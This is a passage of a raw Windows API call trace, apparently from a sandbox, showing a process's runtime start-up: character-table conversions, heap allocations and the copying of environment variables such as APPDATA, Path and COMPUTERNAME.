¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ°É0&t÷\x18", lpUsedDefaultChar=0x0) returned 256 [0054.679] GetLastError () returned 0x0 [0054.679] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0054.679] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ed78, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0054.679] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f438, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ°É0&t÷\x18", lpUsedDefaultChar=0x0) returned 256 [0054.690] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0054.690] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4037ad [0054.739] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x240e98) returned 0x80 [0054.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0054.761] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1f) returned 0x23f648 [0054.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x23f648, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0054.783] GetLastError () returned 0x0 [0054.783] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x4) returned 0x241fd0 [0054.783] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241fd0) returned 0x4 [0054.783] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241fd0, Size=0x8) returned 0x241fd0 [0054.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0054.783] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x36) returned 0x241148 [0054.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x241148, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0054.783] GetLastError () returned 0x0 [0054.794] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241fd0) returned 0x8 [0054.795] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241fd0, Size=0xc) returned 0x241fd0 [0054.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0054.795] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x37) returned 0x241188 [0054.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x241188, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0054.795] GetLastError () returned 0x0 [0054.795] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241fd0) returned 0xc [0054.795] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241fd0, Size=0x10) returned 0x241fd0 [0054.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0054.795] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x3c) returned 0x235c28 [0054.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x235c28, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0054.795] GetLastError () returned 0x0 [0054.795] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241fd0) returned 0x10 [0054.795] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241fd0, Size=0x14) returned 0x2411c8 [0054.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0054.795] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x31) returned 0x2411e8 [0054.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2411e8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0054.795] GetLastError () returned 0x0 [0054.795] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2411c8) returned 0x14 [0054.795] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2411c8, Size=0x18) returned 0x2411c8 [0054.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0054.795] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x17) returned 0x241228 [0054.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x241228, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0054.795] GetLastError () returned 0x0 [0054.795] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2411c8) returned 0x18 [0054.796] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2411c8, Size=0x1c) returned 0x241248 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0054.796] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x24) returned 0x23ae80 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x23ae80, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0054.796] GetLastError () returned 0x0 [0054.796] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241248) returned 0x1c [0054.796] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241248, Size=0x20) returned 0x241248 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0054.796] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x14) returned 0x2411c8 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0054.796] GetLastError () returned 0x0 [0054.796] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241248) returned 0x20 [0054.796] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241248, Size=0x24) returned 0x241248 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0054.796] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xd) returned 0x23ec20 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x23ec20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0054.796] GetLastError () returned 0x0 [0054.796] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241248) returned 0x24 [0054.796] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241248, Size=0x28) returned 0x241248 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0054.796] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x25) returned 0x23aeb0 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x23aeb0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0054.796] GetLastError () returned 0x0 [0054.796] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241248) returned 0x28 [0054.796] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241248, Size=0x2c) returned 0x241248 [0054.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0054.797] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x39) returned 0x235c70 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x235c70, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0054.797] GetLastError () returned 0x0 [0054.797] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241248) returned 0x2c [0054.797] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241248, Size=0x30) returned 0x241248 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0054.797] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x18) returned 0x241280 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x241280, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0054.797] GetLastError () returned 0x0 [0054.797] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241248) returned 0x30 [0054.797] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241248, Size=0x34) returned 0x2412a0 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0054.797] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x17) returned 0x241248 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x241248, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0054.797] GetLastError () returned 0x0 [0054.797] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2412a0) returned 0x34 [0054.797] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2412a0, Size=0x38) returned 0x2412a0 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0054.797] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xe) returned 0x23ec38 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x23ec38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0054.797] GetLastError () returned 0x0 [0054.797] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2412a0) returned 0x38 [0054.797] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2412a0, Size=0x3c) returned 0x2412a0 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0054.797] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x69) returned 0x2412e8 [0054.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x2412e8, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0054.798] GetLastError () returned 0x0 [0054.798] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2412a0) returned 0x3c [0054.798] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2412a0, Size=0x40) returned 0x2412a0 [0054.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0054.798] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x3e) returned 0x235cb8 [0054.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x235cb8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0054.798] GetLastError () returned 0x0 [0054.798] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x2412a0) returned 0x40 [0054.798] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x2412a0, Size=0x44) returned 0x241360 [0054.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0054.798] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1b) returned 0x23f670 [0054.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x23f670, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0054.798] GetLastError () returned 0x0 [0054.798] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x44 [0054.798] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x48) returned 0x241360 [0054.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0054.798] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1d) returned 0x23f698 [0054.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x23f698, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0054.798] GetLastError () returned 0x0 [0054.798] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x241360) returned 0x48 [0054.798] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x241360, Size=0x4c) returned 0x241360 [0054.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0054.798] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x48) returned 0x237050 [0054.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x237050, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 